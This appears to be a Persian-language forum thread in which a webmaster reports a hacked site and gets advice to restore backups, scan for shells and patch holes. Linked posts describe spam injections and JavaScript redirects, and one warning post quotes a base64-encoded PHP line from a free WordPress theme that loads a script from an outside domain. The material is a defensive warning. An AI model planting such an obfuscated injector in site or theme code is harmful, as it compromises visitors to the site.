salarian

هک شدن سایت

4 پست در این موضوع قرار دارد

سلام دوستان کمکم کنید

سایتم رو هک کردن

باید چیکار کنم

راهنماییم کنید

post-5757-0-71236200-1433010127_thumb.pn

0

به اشتراک گذاری این پست


لینک به پست

به پشتیبان هاستتون تیکت بزنید و بک اپ چند روز قبل رو برگردونید.

5

به اشتراک گذاری این پست


لینک به پست

علاوه بر اینکه به هاستینگ تیکت میزنید اقدام به اسکن و بررسی کنید تا اگر شلر و یا باگ بر روی سایت و یا سرور شماست پیدا کنید و آن پچ کنید تا باز به این مشکل نخورید

3

به اشتراک گذاری این پست


لینک به پست

با سلام امنیت سرور شما 0 میباشد

http://www.zone-h.com/archive/ip=144.76.25.217

همچنین با رعایت موارد امنیتی میشه تا حدودی در مقابل سرور ناامن مقاومت کرد :wub: :wub: :wub:

3

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط hadiseraj.SEM
      سلام  خسته نباشید دوستان
      من یک سایتی دارم که تقریبا 1 هفته پیش از طرف گوگل وب مستر برام آلارم هک شدن اومد و پیگیری کردم و متوجه شدم که سایت هک شده ، یک لینک یا فولدر ( نمیدونم دقیقا ) اضافه شده به زبان چینی  که نمیدونم کجای هاست هست . ( این لینک : 
      http://drmaham.com/41-cqfrzj/6782940513--usnywpft/10965
       
      90 درصد لینک های سایت هم وقتی تو گوگل سرچ میکنم  همه به صورت زبان چینی میاد ( عکسشو پیوست کردم )
      میخوام بدونم الان بهترین کاری که میتونم بکنم چیه؟  میشه این اطلاعات مخرب رو پاک کرد و سایتو دوباره اوکی کرد ؟
      2 بار هم از ریستور بکاپ استفاده کردم  تا تاریخ 15 روز قبل هم برگردونم سایتو  اما هنوز این فایل بالا که لینکشو فرستادم هست .
      ممنون میشم راهنمایم کنید .
       

    • توسط mohandes1900
      سلام خسته نباشید به همه ی فعالان انجمن
      آیا کسی هست که بدونه چرا بازدید برخی از آی پی ها از سایت خیلی زیاده؟ و این که آیا ممکنه اسپم و یا ربات باشن و از کجا باید این رو بفهیمد؟
      آیا ممکنه ربات موتورهای جستجو باشه و از کجا باید این رو بفهمیم؟
    • توسط admintory
      سلام
      صورت مسئله:
      روی یک هاست چندین سایت دارم. امروز برای یکیشون متوجه اعمال خرابکاری شدم.
      آدرس سایت مورد نظر: http://golbahardaneh.com
      این سایت بعد لود فایل های js ریدایرکت میشه روی یک آی پی نامربوط. آدرس هدف: http://134.249.116.78/jquery.js
      هیچ بک آپی از قبل ندارم.
      کاری که من کردم:
      1- از فایل ها و دیتابیس فعلی بک آپ گرفتم.
      2- افزونه امنیتی WordFence رو نصب کردم و سایت رو اسکن کردم. نتیجه اسکن تایید آلوده بودن حدود 400 فایل js به کد مخرب بود.
      3- از طریق این لینک   https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection  کد مخرب رو پیدا کردم و جاش یه کد جایگزین رو در همه فایلها گذاشتم.
      4- توی htaccess آدرس هدف رو بن کردم.
      5- توی یه سایت اسکنر امنیتی معروف سایت رو اسکن کردم (SUCURI SITE) که چند تا هشدار Maleware به من داد. ولی چیزی نفهمیدم ازش
      6- وردپرس و پلاگین ها رو آپدیت کردم.
       
      ولی هنوز مشکل حل نشده. لطفا کمک کنید.
      نکته: ریدایرکت فقط برای صفحه اصلی سایته و صفحات داخلی با وارد کردن مستقیم آدرس صفحه لود میشن. مثل http://golbahardaneh.com/business-model
    • توسط محمدرضا فتحی
      چند روزی هست که وقتی گزارش گوگل آنالیتیک رو نگاه میکنم و میخوام چک کنم ببینم کدوم یکی از پیج های وبسایتم بیشتر بازدید شده با یک url مربوط به وبسایت reddit.com مواجه میشم. امکانش هست این وبسایت، سایت من رو هک کرده باشه و وقتی کاربرای اینترنت توی سایت من هستن ریدایرکتشون کنه توی سایت خودش؟
      اگر حدسم درسته لطفا راهنمایی کنید چطور باید جلوش رو بگیرم و اگر اشتباهه پس چرا گوگل آنالیتیک این url رو جزء پیج های نمایش داده شده وبسایت من بهم نشون میده؟
      این آدرس کاملی هست که گوگل آنالیتیک بهم نشون میده:
      www.reddit.com/r/technology/comments/5foynf/lifehac%C4%B8ercom_original_idn_fake_safe_best_on_ff/
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....